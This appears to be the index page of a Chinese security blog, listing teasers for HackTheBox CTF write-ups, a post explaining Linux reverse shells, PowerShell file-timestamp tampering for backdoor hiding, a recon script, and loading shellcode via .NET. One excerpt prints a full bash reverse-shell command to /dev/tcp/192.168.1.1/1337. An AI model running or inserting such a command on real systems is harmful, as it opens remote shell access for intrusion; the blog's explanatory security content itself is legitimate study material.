HackTheBox petpet rcbee WriteUP

题目

Bees are comfy 🍯
bees are great 🌟🌟🌟
this is a petpet generator 👋
let’s join forces and save the bees today! 🐝

阅读更多 >>

HackTheBox Toxic WriteUP

题目

Humanity has exploited our allies, the dart frogs, for far too long, take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸

阅读更多 >>

HackTheBox WeatherAPP WriteUP

题目

A pit of eternal darkness, a mindless journey of abeyance, this feels like a never-ending dream. I think I’m hallucinating with the memories of my past life, it’s a reflection of how thought I would have turned out if I had tried enough. A weatherman, I said! Someone my community would look up to, someone who is to be respected. I guess this is my way of telling you that I’ve been waiting for someone to come and save me. This weather application is notorious for trapping the souls of ambitious weathermen like me. Please defeat the evil bruxa that’s operating this website and set me free! 🧙‍♀️

阅读更多 >>

HackTheBox LoveTok WriteUP

题目

True love is tough, and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back. 💛

阅读更多 >>

关于Linux下反弹Shell命令的解释

Linux下反弹shell最常用的一句命令:

bash -c 'exec bash -i &>/dev/tcp/192.168.1.1/1337 <&1'

对这条命令的理解,以我个人经历而言,大概分为几个阶段

阅读更多 >>

利用Powershell修改文件/文件夹时间属性

应用场景

  • 后门隐藏
  • 蜜罐搭建
  • 钓鱼/水坑攻击

阅读更多 >>

一个Get-Title的自我修养

0x00 前言

最近要整理大量的网页资料,刚好完善一下以前写的get-title脚本。
目标:获取所有URL对应网页的Title,并以友好的格式输出至文件。
此脚本原来是渗透的时候搞网段用的,把扫出来的Web的title列举出来,从而对自己的目标有个大致的概念。但是早先的版本只能说是可以将就着用,往往输出的格式乱七八糟,刚好借着这次机会重写一下。也顺便将其从python2过渡到python3。

阅读更多 >>

2020 - 2021

总结一下吧。

2020年是很浑浊的一年,直到昨晚跨年的时候我还是很懵逼,潜意识还完全没意识到2020年就这么过去了。

这一年发生了很多的事情,对我个人而言,对这个世界而言,都是如此。这中间的共同点是,似乎没有什么事情是比较完满的。但这一篇并不是回忆录,所以我也不打算像收拾抽屉一样把它们一件一件堆叠起来。捡一些想说的说吧。

阅读更多 >>

利用.Net Framework加载Shellcode

0x00 场景

  • Windows操作系统
  • 存在.Net Framework环境
  • 无法上传exe等可执行文件

阅读更多 >>